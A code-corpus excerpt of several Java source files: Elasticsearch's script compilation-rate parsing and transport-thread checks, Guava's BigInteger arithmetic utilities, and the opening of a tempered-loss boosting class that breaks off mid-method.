private TokenBucketState(long lastInlineCompileTime, double availableTokens, boolean tokenSuccessfullyTaken) {
this.lastInlineCompileTime = lastInlineCompileTime;
this.availableTokens = availableTokens;
this.tokenSuccessfullyTaken = tokenSuccessfullyTaken;
}
}
public static class CompilationRate {
public final int count;
public final TimeValue time;
private final String source;
public CompilationRate(Integer count, TimeValue time) {
this.count = count;
this.time = time;
this.source = null;
}
public CompilationRate(Tuple<Integer, TimeValue> rate) {
this(rate.v1(), rate.v2());
}
/**
* Parses a string as a non-negative int count and a {@code TimeValue} as arguments split by a slash
*/
public CompilationRate(String value) {
if (value.contains("/") == false || value.startsWith("/") || value.endsWith("/")) {
throw new IllegalArgumentException(
"parameter must contain a positive integer and a timevalue, i.e. 10/1m, but was [" + value + "]"
);
}
int idx = value.indexOf('/');
String count = value.substring(0, idx);
String time = value.substring(idx + 1);
try {
int rate = Integer.parseInt(count);
if (rate < 0) {
throw new IllegalArgumentException("rate [" + rate + "] must be positive");
}
TimeValue timeValue = TimeValue.parseTimeValue(time, "script.max_compilations_rate");
if (timeValue.nanos() <= 0) {
throw new IllegalArgumentException("time value [" + time + "] must be positive");
}
// protect against a limit that is too fine-grained to enforce, i.e. anything below a one minute resolution
if (timeValue.seconds() < 60) {
throw new IllegalArgumentException("time value [" + time + "] must be at least on a one minute resolution");
}
this.count = rate;
this.time = timeValue;
this.source = value;
} catch (NumberFormatException e) {
// the number format exception message is so confusing that it makes more sense to wrap it with a useful one
throw new IllegalArgumentException("could not parse [" + count + "] as integer in value [" + value + "]", e);
}
}
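// Example of the accepted format (hypothetical values): "75/5m" parses to count = 75 and
// time = 5 minutes, while "10/30s" is rejected because the time component must be at least
// one minute.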
public Tuple<Integer, TimeValue> asTuple() {
return new Tuple<>(this.count, this.time);
}
@Override
public String toString() {
return source != null ? source : count + "/" + time.toHumanReadableString(0);
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
CompilationRate that = (CompilationRate) o;
return count == that.count && Objects.equals(time, that.time);
}
@Override
public int hashCode() {
return Objects.hash(count, time);
}
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/script/ScriptCache.java |
1,130 | /*
* Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
* or more contributor license agreements. Licensed under the Elastic License
* 2.0 and the Server Side Public License, v 1; you may not use this file except
* in compliance with, at your election, the Elastic License 2.0 or the Server
* Side Public License, v 1.
*/
package org.elasticsearch.transport;
import org.elasticsearch.common.util.concurrent.ThreadContext;
import org.elasticsearch.http.HttpServerTransport;
import org.elasticsearch.tasks.Task;
import java.util.Set;
public enum Transports {
;
private static final Set<String> REQUEST_HEADERS_ALLOWED_ON_DEFAULT_THREAD_CONTEXT = Set.of(
Task.TRACE_ID,
Task.TRACE_PARENT,
Task.X_OPAQUE_ID_HTTP_HEADER,
Task.X_ELASTIC_PRODUCT_ORIGIN_HTTP_HEADER
);
/** threads whose name is prefixed by this string will be considered network threads, even though they aren't */
public static final String TEST_MOCK_TRANSPORT_THREAD_PREFIX = "__mock_network_thread";
private static final String[] TRANSPORT_THREAD_NAMES = new String[] {
'[' + HttpServerTransport.HTTP_SERVER_WORKER_THREAD_NAME_PREFIX + ']',
'[' + TcpTransport.TRANSPORT_WORKER_THREAD_NAME_PREFIX + ']',
TEST_MOCK_TRANSPORT_THREAD_PREFIX };
/**
* Utility method to detect whether a thread is a network thread. Typically
* used in assertions to make sure that we do not call blocking code from
* networking threads.
*/
public static boolean isTransportThread(Thread t) {
return isTransportThread(t.getName());
}
/**
* Utility method to detect whether a thread is a network thread. Typically
* used in assertions to make sure that we do not call blocking code from
* networking threads.
* @param threadName the name of the thread
*/
public static boolean isTransportThread(String threadName) {
for (String s : TRANSPORT_THREAD_NAMES) {
if (threadName.contains(s)) {
return true;
}
}
return false;
}
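// Illustrative names (assuming HTTP_SERVER_WORKER_THREAD_NAME_PREFIX / TRANSPORT_WORKER_THREAD_NAME_PREFIX
// render as "http_server_worker" / "transport_worker"): a thread called
// "elasticsearch[node-1][transport_worker][T#2]" contains "[transport_worker]" and is treated as a
// transport thread, whereas "elasticsearch[node-1][search][T#3]" is not.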
public static boolean assertTransportThread() {
final Thread t = Thread.currentThread();
assert isTransportThread(t) : "Expected transport thread but got [" + t + "]";
return true;
}
public static boolean assertNotTransportThread(String reason) {
final Thread t = Thread.currentThread();
assert isTransportThread(t) == false : "Expected current thread [" + t + "] to not be a transport thread. Reason: [" + reason + "]";
return true;
}
public static boolean assertDefaultThreadContext(ThreadContext threadContext) {
assert threadContext.getRequestHeadersOnly().isEmpty()
|| REQUEST_HEADERS_ALLOWED_ON_DEFAULT_THREAD_CONTEXT.containsAll(threadContext.getRequestHeadersOnly().keySet())
: "expected empty context but was " + threadContext.getRequestHeadersOnly() + " on " + Thread.currentThread().getName();
return true;
}
}
| elastic/elasticsearch | server/src/main/java/org/elasticsearch/transport/Transports.java |
1,131 | /*
* Copyright (C) 2011 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
package com.google.common.math;
import static com.google.common.base.Preconditions.checkArgument;
import static com.google.common.base.Preconditions.checkNotNull;
import static com.google.common.math.MathPreconditions.checkNonNegative;
import static com.google.common.math.MathPreconditions.checkPositive;
import static com.google.common.math.MathPreconditions.checkRoundingUnnecessary;
import static java.math.RoundingMode.CEILING;
import static java.math.RoundingMode.FLOOR;
import static java.math.RoundingMode.HALF_EVEN;
import com.google.common.annotations.GwtCompatible;
import com.google.common.annotations.GwtIncompatible;
import com.google.common.annotations.VisibleForTesting;
import java.math.BigDecimal;
import java.math.BigInteger;
import java.math.RoundingMode;
import java.util.ArrayList;
import java.util.List;
/**
* A class for arithmetic on values of type {@code BigInteger}.
*
* <p>The implementations of many methods in this class are based on material from Henry S. Warren,
* Jr.'s <i>Hacker's Delight</i>, (Addison Wesley, 2002).
*
* <p>Similar functionality for {@code int} and for {@code long} can be found in {@link IntMath} and
* {@link LongMath} respectively.
*
* @author Louis Wasserman
* @since 11.0
*/
@GwtCompatible(emulated = true)
@ElementTypesAreNonnullByDefault
public final class BigIntegerMath {
/**
* Returns the smallest power of two greater than or equal to {@code x}. This is equivalent to
* {@code BigInteger.valueOf(2).pow(log2(x, CEILING))}.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @since 20.0
*/
public static BigInteger ceilingPowerOfTwo(BigInteger x) {
return BigInteger.ZERO.setBit(log2(x, CEILING));
}
/**
* Returns the largest power of two less than or equal to {@code x}. This is equivalent to {@code
* BigInteger.valueOf(2).pow(log2(x, FLOOR))}.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @since 20.0
*/
public static BigInteger floorPowerOfTwo(BigInteger x) {
return BigInteger.ZERO.setBit(log2(x, FLOOR));
}
/** Returns {@code true} if {@code x} represents a power of two. */
public static boolean isPowerOfTwo(BigInteger x) {
checkNotNull(x);
return x.signum() > 0 && x.getLowestSetBit() == x.bitLength() - 1;
}
/**
* Returns the base-2 logarithm of {@code x}, rounded according to the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not a power of two
*/
@SuppressWarnings("fallthrough")
// TODO(kevinb): remove after this warning is disabled globally
public static int log2(BigInteger x, RoundingMode mode) {
checkPositive("x", checkNotNull(x));
int logFloor = x.bitLength() - 1;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(isPowerOfTwo(x)); // fall through
case DOWN:
case FLOOR:
return logFloor;
case UP:
case CEILING:
return isPowerOfTwo(x) ? logFloor : logFloor + 1;
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
if (logFloor < SQRT2_PRECOMPUTE_THRESHOLD) {
BigInteger halfPower =
SQRT2_PRECOMPUTED_BITS.shiftRight(SQRT2_PRECOMPUTE_THRESHOLD - logFloor);
if (x.compareTo(halfPower) <= 0) {
return logFloor;
} else {
return logFloor + 1;
}
}
// Since sqrt(2) is irrational, log2(x) - logFloor cannot be exactly 0.5
//
// To determine which side of logFloor.5 the logarithm is,
// we compare x^2 to 2^(2 * logFloor + 1).
BigInteger x2 = x.pow(2);
int logX2Floor = x2.bitLength() - 1;
return (logX2Floor < 2 * logFloor + 1) ? logFloor : logFloor + 1;
default:
throw new AssertionError();
}
}
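// Illustrative tie-break check for the HALF_* branch above: for x = 6, logFloor = 2 and halfPower =
// floor(sqrt(2) * 2^2) = 5; since 6 > 5 (i.e. log2(6) lies above logFloor + 0.5), the method
// returns 3 for HALF_DOWN, HALF_UP and HALF_EVEN alike.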
/*
* The maximum number of bits in a square root for which we'll precompute an explicit half power
* of two. This can be any value, but higher values incur more class load time and linearly
* increasing memory consumption.
*/
@VisibleForTesting static final int SQRT2_PRECOMPUTE_THRESHOLD = 256;
@VisibleForTesting
static final BigInteger SQRT2_PRECOMPUTED_BITS =
new BigInteger("16a09e667f3bcc908b2fb1366ea957d3e3adec17512775099da2f590b0667322a", 16);
/**
* Returns the base-10 logarithm of {@code x}, rounded according to the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x <= 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not a power of ten
*/
@GwtIncompatible // TODO
@SuppressWarnings("fallthrough")
public static int log10(BigInteger x, RoundingMode mode) {
checkPositive("x", x);
if (fitsInLong(x)) {
return LongMath.log10(x.longValue(), mode);
}
int approxLog10 = (int) (log2(x, FLOOR) * LN_2 / LN_10);
BigInteger approxPow = BigInteger.TEN.pow(approxLog10);
int approxCmp = approxPow.compareTo(x);
/*
* We adjust approxLog10 and approxPow until they're equal to floor(log10(x)) and
* 10^floor(log10(x)).
*/
if (approxCmp > 0) {
/*
* The code is written so that even completely incorrect approximations will still yield the
* correct answer eventually, but in practice this branch should almost never be entered, and
* even then the loop should not run more than once.
*/
do {
approxLog10--;
approxPow = approxPow.divide(BigInteger.TEN);
approxCmp = approxPow.compareTo(x);
} while (approxCmp > 0);
} else {
BigInteger nextPow = BigInteger.TEN.multiply(approxPow);
int nextCmp = nextPow.compareTo(x);
while (nextCmp <= 0) {
approxLog10++;
approxPow = nextPow;
approxCmp = nextCmp;
nextPow = BigInteger.TEN.multiply(approxPow);
nextCmp = nextPow.compareTo(x);
}
}
int floorLog = approxLog10;
BigInteger floorPow = approxPow;
int floorCmp = approxCmp;
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(floorCmp == 0);
// fall through
case FLOOR:
case DOWN:
return floorLog;
case CEILING:
case UP:
return floorPow.equals(x) ? floorLog : floorLog + 1;
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
// Since sqrt(10) is irrational, log10(x) - floorLog can never be exactly 0.5
BigInteger x2 = x.pow(2);
BigInteger halfPowerSquared = floorPow.pow(2).multiply(BigInteger.TEN);
return (x2.compareTo(halfPowerSquared) <= 0) ? floorLog : floorLog + 1;
default:
throw new AssertionError();
}
}
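// Worked example: for x = 10^20 (too large for the long fast path) log2(x, FLOOR) = 66, so the
// initial guess is approxLog10 = (int) (66 * LN_2 / LN_10) = 19; the else-branch then walks the
// power up once (10^20 <= x) and settles on floorLog = 20 with floorPow equal to x exactly.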
private static final double LN_10 = Math.log(10);
private static final double LN_2 = Math.log(2);
/**
* Returns the square root of {@code x}, rounded with the specified rounding mode.
*
* @throws IllegalArgumentException if {@code x < 0}
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code
* sqrt(x)} is not an integer
*/
@GwtIncompatible // TODO
@SuppressWarnings("fallthrough")
public static BigInteger sqrt(BigInteger x, RoundingMode mode) {
checkNonNegative("x", x);
if (fitsInLong(x)) {
return BigInteger.valueOf(LongMath.sqrt(x.longValue(), mode));
}
BigInteger sqrtFloor = sqrtFloor(x);
switch (mode) {
case UNNECESSARY:
checkRoundingUnnecessary(sqrtFloor.pow(2).equals(x)); // fall through
case FLOOR:
case DOWN:
return sqrtFloor;
case CEILING:
case UP:
int sqrtFloorInt = sqrtFloor.intValue();
boolean sqrtFloorIsExact =
(sqrtFloorInt * sqrtFloorInt == x.intValue()) // fast check mod 2^32
&& sqrtFloor.pow(2).equals(x); // slow exact check
return sqrtFloorIsExact ? sqrtFloor : sqrtFloor.add(BigInteger.ONE);
case HALF_DOWN:
case HALF_UP:
case HALF_EVEN:
BigInteger halfSquare = sqrtFloor.pow(2).add(sqrtFloor);
/*
* We wish to test whether or not x <= (sqrtFloor + 0.5)^2 = halfSquare + 0.25. Since both x
* and halfSquare are integers, this is equivalent to testing whether or not x <=
* halfSquare.
*/
return (halfSquare.compareTo(x) >= 0) ? sqrtFloor : sqrtFloor.add(BigInteger.ONE);
default:
throw new AssertionError();
}
}
@GwtIncompatible // TODO
private static BigInteger sqrtFloor(BigInteger x) {
/*
* Adapted from Hacker's Delight, Figure 11-1.
*
* Using DoubleUtils.bigToDouble, getting a double approximation of x is extremely fast, and
* then we can get a double approximation of the square root. Then, we iteratively improve this
* guess with an application of Newton's method, which sets guess := (guess + (x / guess)) / 2.
* This iteration has the following two properties:
*
* a) every iteration (except potentially the first) has guess >= floor(sqrt(x)). This is
* because guess' is the arithmetic mean of guess and x / guess, sqrt(x) is the geometric mean,
* and the arithmetic mean is always higher than the geometric mean.
*
* b) this iteration converges to floor(sqrt(x)). In fact, the number of correct digits doubles
* with each iteration, so this algorithm takes O(log(digits)) iterations.
*
* We start out with a double-precision approximation, which may be higher or lower than the
* true value. Therefore, we perform at least one Newton iteration to get a guess that's
* definitely >= floor(sqrt(x)), and then continue the iteration until we reach a fixed point.
*/
BigInteger sqrt0;
int log2 = log2(x, FLOOR);
if (log2 < Double.MAX_EXPONENT) {
sqrt0 = sqrtApproxWithDoubles(x);
} else {
int shift = (log2 - DoubleUtils.SIGNIFICAND_BITS) & ~1; // even!
/*
* We have that x / 2^shift < 2^54. Our initial approximation to sqrtFloor(x) will be
* 2^(shift/2) * sqrtApproxWithDoubles(x / 2^shift).
*/
sqrt0 = sqrtApproxWithDoubles(x.shiftRight(shift)).shiftLeft(shift >> 1);
}
BigInteger sqrt1 = sqrt0.add(x.divide(sqrt0)).shiftRight(1);
if (sqrt0.equals(sqrt1)) {
return sqrt0;
}
do {
sqrt0 = sqrt1;
sqrt1 = sqrt0.add(x.divide(sqrt0)).shiftRight(1);
} while (sqrt1.compareTo(sqrt0) < 0);
return sqrt0;
}
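// Illustrative check of the iteration: for x = 10^40 the double-based seed is already very close to
// sqrt(x) = 10^20; the first Newton step guess' = (guess + x / guess) / 2 lands at or just above
// floor(sqrt(x)), and the loop exits as soon as the guess stops decreasing.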
@GwtIncompatible // TODO
private static BigInteger sqrtApproxWithDoubles(BigInteger x) {
return DoubleMath.roundToBigInteger(Math.sqrt(DoubleUtils.bigToDouble(x)), HALF_EVEN);
}
/**
* Returns {@code x}, rounded to a {@code double} with the specified rounding mode. If {@code x}
* is precisely representable as a {@code double}, its {@code double} value will be returned;
* otherwise, the rounding will choose between the two nearest representable values with {@code
* mode}.
*
* <p>For the case of {@link RoundingMode#HALF_DOWN}, {@code HALF_UP}, and {@code HALF_EVEN},
* infinite {@code double} values are considered infinitely far away. For example, 2^2000 is not
* representable as a double, but {@code roundToDouble(BigInteger.valueOf(2).pow(2000), HALF_UP)}
* will return {@code Double.MAX_VALUE}, not {@code Double.POSITIVE_INFINITY}.
*
* <p>For the case of {@link RoundingMode#HALF_EVEN}, this implementation uses the IEEE 754
* default rounding mode: if the two nearest representable values are equally near, the one with
* the least significant bit zero is chosen. (In such cases, both of the nearest representable
* values are even integers; this method returns the one that is a multiple of a greater power of
* two.)
*
* @throws ArithmeticException if {@code mode} is {@link RoundingMode#UNNECESSARY} and {@code x}
* is not precisely representable as a {@code double}
* @since 30.0
*/
@GwtIncompatible
public static double roundToDouble(BigInteger x, RoundingMode mode) {
return BigIntegerToDoubleRounder.INSTANCE.roundToDouble(x, mode);
}
@GwtIncompatible
private static class BigIntegerToDoubleRounder extends ToDoubleRounder<BigInteger> {
static final BigIntegerToDoubleRounder INSTANCE = new BigIntegerToDoubleRounder();
private BigIntegerToDoubleRounder() {}
@Override
double roundToDoubleArbitrarily(BigInteger bigInteger) {
return DoubleUtils.bigToDouble(bigInteger);
}
@Override
int sign(BigInteger bigInteger) {
return bigInteger.signum();
}
@Override
BigInteger toX(double d, RoundingMode mode) {
return DoubleMath.roundToBigInteger(d, mode);
}
@Override
BigInteger minus(BigInteger a, BigInteger b) {
return a.subtract(b);
}
}
/**
* Returns the result of dividing {@code p} by {@code q}, rounding using the specified {@code
* RoundingMode}.
*
* @throws ArithmeticException if {@code q == 0}, or if {@code mode == UNNECESSARY} and {@code a}
* is not an integer multiple of {@code b}
*/
@GwtIncompatible // TODO
public static BigInteger divide(BigInteger p, BigInteger q, RoundingMode mode) {
BigDecimal pDec = new BigDecimal(p);
BigDecimal qDec = new BigDecimal(q);
return pDec.divide(qDec, 0, mode).toBigIntegerExact();
}
/**
* Returns {@code n!}, that is, the product of the first {@code n} positive integers, or {@code 1}
* if {@code n == 0}.
*
* <p><b>Warning:</b> the result takes <i>O(n log n)</i> space, so use cautiously.
*
* <p>This uses an efficient binary recursive algorithm to compute the factorial with balanced
* multiplies. It also removes all the 2s from the intermediate products (shifting them back in at
* the end).
*
* @throws IllegalArgumentException if {@code n < 0}
*/
public static BigInteger factorial(int n) {
checkNonNegative("n", n);
// If the factorial is small enough, just use LongMath to do it.
if (n < LongMath.factorials.length) {
return BigInteger.valueOf(LongMath.factorials[n]);
}
// Pre-allocate space for our list of intermediate BigIntegers.
int approxSize = IntMath.divide(n * IntMath.log2(n, CEILING), Long.SIZE, CEILING);
ArrayList<BigInteger> bignums = new ArrayList<>(approxSize);
// Start from the pre-computed maximum long factorial.
int startingNumber = LongMath.factorials.length;
long product = LongMath.factorials[startingNumber - 1];
// Strip off 2s from this value.
int shift = Long.numberOfTrailingZeros(product);
product >>= shift;
// Use floor(log2(num)) + 1 to prevent overflow of multiplication.
int productBits = LongMath.log2(product, FLOOR) + 1;
int bits = LongMath.log2(startingNumber, FLOOR) + 1;
// Check for the next power of two boundary, to save us a CLZ operation.
int nextPowerOfTwo = 1 << (bits - 1);
// Iteratively fold numbers into the long product for as long as it still fits in a long.
for (long num = startingNumber; num <= n; num++) {
// Check to see if the floor(log2(num)) + 1 has changed.
if ((num & nextPowerOfTwo) != 0) {
nextPowerOfTwo <<= 1;
bits++;
}
// Get rid of the 2s in num.
int tz = Long.numberOfTrailingZeros(num);
long normalizedNum = num >> tz;
shift += tz;
// Adjust floor(log2(num)) + 1.
int normalizedBits = bits - tz;
// If it won't fit in a long, then we store off the intermediate product.
if (normalizedBits + productBits >= Long.SIZE) {
bignums.add(BigInteger.valueOf(product));
product = 1;
productBits = 0;
}
product *= normalizedNum;
productBits = LongMath.log2(product, FLOOR) + 1;
}
// Check for leftovers.
if (product > 1) {
bignums.add(BigInteger.valueOf(product));
}
// Efficiently multiply all the intermediate products together.
return listProduct(bignums).shiftLeft(shift);
}
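// Illustrative trace (n this small is actually served directly from LongMath.factorials): 10! =
// 3628800 = 14175 << 8, i.e. the algorithm keeps the odd part 14175 in the running product and
// shifts the 8 stripped factors of two back in at the very end via shiftLeft(shift).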
static BigInteger listProduct(List<BigInteger> nums) {
return listProduct(nums, 0, nums.size());
}
static BigInteger listProduct(List<BigInteger> nums, int start, int end) {
switch (end - start) {
case 0:
return BigInteger.ONE;
case 1:
return nums.get(start);
case 2:
return nums.get(start).multiply(nums.get(start + 1));
case 3:
return nums.get(start).multiply(nums.get(start + 1)).multiply(nums.get(start + 2));
default:
// Otherwise, split the list in half and recursively do this.
int m = (end + start) >>> 1;
return listProduct(nums, start, m).multiply(listProduct(nums, m, end));
}
}
/**
* Returns {@code n} choose {@code k}, also known as the binomial coefficient of {@code n} and
* {@code k}, that is, {@code n! / (k! (n - k)!)}.
*
* <p><b>Warning:</b> the result can take as much as <i>O(k log n)</i> space.
*
* @throws IllegalArgumentException if {@code n < 0}, {@code k < 0}, or {@code k > n}
*/
public static BigInteger binomial(int n, int k) {
checkNonNegative("n", n);
checkNonNegative("k", k);
checkArgument(k <= n, "k (%s) > n (%s)", k, n);
if (k > (n >> 1)) {
k = n - k;
}
if (k < LongMath.biggestBinomials.length && n <= LongMath.biggestBinomials[k]) {
return BigInteger.valueOf(LongMath.binomial(n, k));
}
BigInteger accum = BigInteger.ONE;
long numeratorAccum = n;
long denominatorAccum = 1;
int bits = LongMath.log2(n, CEILING);
int numeratorBits = bits;
for (int i = 1; i < k; i++) {
int p = n - i;
int q = i + 1;
// log2(p) >= bits - 1, because p >= n/2
if (numeratorBits + bits >= Long.SIZE - 1) {
// The numerator is as big as it can get without risking overflow.
// Multiply numeratorAccum / denominatorAccum into accum.
accum =
accum
.multiply(BigInteger.valueOf(numeratorAccum))
.divide(BigInteger.valueOf(denominatorAccum));
numeratorAccum = p;
denominatorAccum = q;
numeratorBits = bits;
} else {
// We can definitely multiply into the long accumulators without overflowing them.
numeratorAccum *= p;
denominatorAccum *= q;
numeratorBits += bits;
}
}
return accum
.multiply(BigInteger.valueOf(numeratorAccum))
.divide(BigInteger.valueOf(denominatorAccum));
}
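// Small sanity example (handled by the LongMath fast path in practice): binomial(6, 2) = 15.
// For larger inputs the long accumulators numeratorAccum/denominatorAccum are folded into accum
// whenever numeratorBits + bits threatens to reach Long.SIZE - 1, keeping the longs overflow-free.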
// Returns true if BigInteger.valueOf(x.longValue()).equals(x).
@GwtIncompatible // TODO
static boolean fitsInLong(BigInteger x) {
return x.bitLength() <= Long.SIZE - 1;
}
private BigIntegerMath() {}
}
| google/guava | android/guava/src/com/google/common/math/BigIntegerMath.java |
1,134 | import java.io.*;
import java.util.*;
public class Boost implements Debuggable {
public static int ITER_STOP;
public static String KEY_NAME_TEMPERED_LOSS = "@TemperedLoss", KEY_NAME_LOG_LOSS = "@LogLoss";
public static String[] KEY_NAME = {KEY_NAME_TEMPERED_LOSS, KEY_NAME_LOG_LOSS};
public static String[] KEY_NAME_DISPLAY = {"TemperedLoss", "LogLoss"};
public static double MAX_PRED_VALUE = 100.0;
public static int MAX_SPLIT_TEST = 2000;
public static double COEFF_GRAD = 0.001;
public static double START_T = 0.9;
public static String METHOD_NAME(String s) {
int i = 0;
do {
if (KEY_NAME[i].equals(s)) return KEY_NAME_DISPLAY[i];
i++;
} while (i < KEY_NAME.length);
Dataset.perror("Boost.class :: no keyword " + s);
return "";
}
public static void CHECK_NAME(String s) {
int i = 0;
do {
if (KEY_NAME[i].equals(s)) return;
i++;
} while (i < KEY_NAME.length);
Dataset.perror("Boost.class :: no keyword " + s);
}
Domain myDomain;
int max_number_tree, max_size_tree;
double average_number_leaves, average_depth, tempered_t, next_t, grad_Z;
boolean adaptive_t = false;
String name, clamping;
DecisionTree[] allTrees;
DecisionTree[][] recordAllTrees;
double[] allLeveragingCoefficients;
MonotonicTreeGraph[][] recordAllMonotonicTreeGraphs_boosting_weights;
MonotonicTreeGraph[][] recordAllMonotonicTreeGraphs_cardinals;
double[] z_tilde;
Boost(Domain d, String nn, int maxnt, int maxst, double tt, String clamped) {
myDomain = d;
name = nn;
clamping = clamped;
Boost.CHECK_NAME(name);
max_number_tree = maxnt;
max_size_tree = maxst;
if (tt == -1.0) {
adaptive_t = true;
tempered_t = START_T;
} else tempered_t = tt;
if (!name.equals(Boost.KEY_NAME_TEMPERED_LOSS)) tempered_t = 1.0; // not the tempered loss
allTrees = null;
recordAllMonotonicTreeGraphs_boosting_weights = recordAllMonotonicTreeGraphs_cardinals = null;
allLeveragingCoefficients = z_tilde = null;
average_number_leaves = average_depth = 0.0;
recordAllTrees = new DecisionTree[NUMBER_STRATIFIED_CV][];
recordAllMonotonicTreeGraphs_boosting_weights = new MonotonicTreeGraph[NUMBER_STRATIFIED_CV][];
recordAllMonotonicTreeGraphs_cardinals = new MonotonicTreeGraph[NUMBER_STRATIFIED_CV][];
grad_Z = -1.0;
}
public String fullName() {
String ret = Boost.METHOD_NAME(name);
ret +=
"["
+ max_number_tree
+ "("
+ max_size_tree
+ "):"
+ ((clamping.equals(Algorithm.CLAMPED)) ? "1" : "0")
+ "]";
if (!adaptive_t) ret += "{" + tempered_t + "}";
else ret += "{" + -1.0 + "}";
return ret;
}
public Vector boost(int index_algo) {
Vector v = new Vector(), v_cur = null;
Vector<DecisionTree> all_trees;
Vector<Double> all_leveraging_coefficients;
Vector<Double> all_zs;
Vector<Double> sequence_empirical_risks = new Vector<>();
Vector<Double> sequence_true_risks = new Vector<>();
Vector<Double> sequence_empirical_risks_MonotonicTreeGraph = new Vector<>();
Vector<Double> sequence_true_risks_MonotonicTreeGraph = new Vector<>();
Vector<Double> sequence_min_codensity = new Vector<>();
Vector<Double> sequence_max_codensity = new Vector<>();
// the sequence_* vectors contain the errors of the tree ensemble BUILT UP TO EACH INDEX
Vector<Integer> sequence_cardinal_nodes = new Vector<>();
Vector<Vector<Double>> sequence_sequence_empirical_risks = new Vector<>();
Vector<Vector<Double>> sequence_sequence_true_risks = new Vector<>();
Vector<Vector<Double>> sequence_sequence_empirical_risks_MonotonicTreeGraph = new Vector<>();
Vector<Vector<Double>> sequence_sequence_true_risks_MonotonicTreeGraph = new Vector<>();
Vector<Vector<Double>> sequence_sequence_min_codensity = new Vector<>();
Vector<Vector<Double>> sequence_sequence_max_codensity = new Vector<>();
DecisionTree dt;
int i, j, curcard = 0;
double leveraging_mu, leveraging_alpha, expected_edge, curerr, opterr, ser_mtg, str_mtg;
double err_fin,
err_fin_MonotonicTreeGraph,
err_best,
perr_fin,
perr_fin_MonotonicTreeGraph,
perr_best;
int card_nodes_fin, card_nodes_best, trees_fin, trees_best;
double[] min_codensity = new double[max_number_tree];
double[] max_codensity = new double[max_number_tree];
System.out.println(fullName() + " (eta = " + myDomain.myDS.eta_noise + ")");
for (i = 0; i < NUMBER_STRATIFIED_CV; i++) {
all_trees = new Vector<>();
all_leveraging_coefficients = new Vector<>();
all_zs = new Vector<>();
recordAllTrees[i] = new DecisionTree[max_number_tree];
if (adaptive_t) tempered_t = Boost.START_T;
TemperedBoostException.RESET_COUNTS();
allTrees = null;
allLeveragingCoefficients = null;
System.out.print("> Fold " + (i + 1) + "/" + NUMBER_STRATIFIED_CV + " -- ");
myDomain.myDS.init_weights(name, i, tempered_t);
v_cur = new Vector();
// saves in this order:
//
// COMPLETE SUBSET OF TREES: err = empirical risk on fold
// COMPLETE SUBSET OF TREES: perr = estimated true risk on fold
// COMPLETE SUBSET OF TREES: tree number
// COMPLETE SUBSET OF TREES: tree size (total card of all nodes)
sequence_empirical_risks = new Vector();
sequence_true_risks = new Vector();
sequence_empirical_risks_MonotonicTreeGraph = new Vector();
sequence_true_risks_MonotonicTreeGraph = new Vector();
sequence_min_codensity = new Vector();
sequence_max_codensity = new Vector();
sequence_cardinal_nodes = new Vector();
min_codensity = new double[max_number_tree];
for (j = 0; j < max_number_tree; j++) {
System.out.print(".");
v_cur = new Vector();
dt = oneTree(j, i);
leveraging_mu = dt.leveraging_mu(); // leveraging coefficient
curcard += dt.number_nodes;
average_number_leaves += (double) dt.leaves.size();
average_depth += (double) dt.depth;
all_trees.addElement(dt);
leveraging_alpha = dt.leveraging_alpha(leveraging_mu, all_zs);
all_leveraging_coefficients.addElement(new Double(leveraging_alpha));
if ((SAVE_PARAMETERS_DURING_TRAINING) || (j == max_number_tree - 1)) {
sequence_empirical_risks.addElement(
new Double(
ensemble_error_noise_free(
all_trees, all_leveraging_coefficients, true, i, false)));
sequence_true_risks.addElement(
new Double(
ensemble_error_noise_free(
all_trees, all_leveraging_coefficients, false, i, false)));
ser_mtg =
ensemble_error_noise_free(all_trees, all_leveraging_coefficients, true, i, true);
sequence_empirical_risks_MonotonicTreeGraph.addElement(new Double(ser_mtg));
str_mtg =
ensemble_error_noise_free(all_trees, all_leveraging_coefficients, false, i, true);
sequence_true_risks_MonotonicTreeGraph.addElement(new Double(str_mtg));
sequence_cardinal_nodes.addElement(new Integer(curcard));
}
if ((adaptive_t) && (j > 0))
tempered_t = next_t; // update t only at this point, otherwise the computations within one iteration would mix two values of t
if (name.equals(Boost.KEY_NAME_TEMPERED_LOSS)) {
try {
reweight_examples_tempered_loss(
dt, leveraging_mu, i, all_zs, j, min_codensity, max_codensity);
} catch (TemperedBoostException eee) {
min_codensity[j] = -1.0;
max_codensity[j] = -1.0;
reweight_examples_infinite_weight(dt, leveraging_mu, i, all_zs);
}
} else if (name.equals(Boost.KEY_NAME_LOG_LOSS)) {
reweight_examples_log_loss(dt, leveraging_mu, i);
} else Dataset.perror("Boost.class :: no such loss as " + name);
if ((SAVE_PARAMETERS_DURING_TRAINING) || (j == max_number_tree - 1)) {
sequence_min_codensity.addElement(new Double(min_codensity[j]));
sequence_max_codensity.addElement(new Double(max_codensity[j]));
}
if (j % 10 == 0) System.out.print(myDomain.memString());
}
if (SAVE_PARAMETERS_DURING_TRAINING) {
sequence_sequence_empirical_risks.addElement(sequence_empirical_risks);
sequence_sequence_true_risks.addElement(sequence_true_risks);
sequence_sequence_empirical_risks_MonotonicTreeGraph.addElement(
sequence_empirical_risks_MonotonicTreeGraph);
sequence_sequence_true_risks_MonotonicTreeGraph.addElement(
sequence_true_risks_MonotonicTreeGraph);
sequence_sequence_min_codensity.addElement(sequence_min_codensity);
sequence_sequence_max_codensity.addElement(sequence_max_codensity);
}
allTrees = new DecisionTree[max_number_tree];
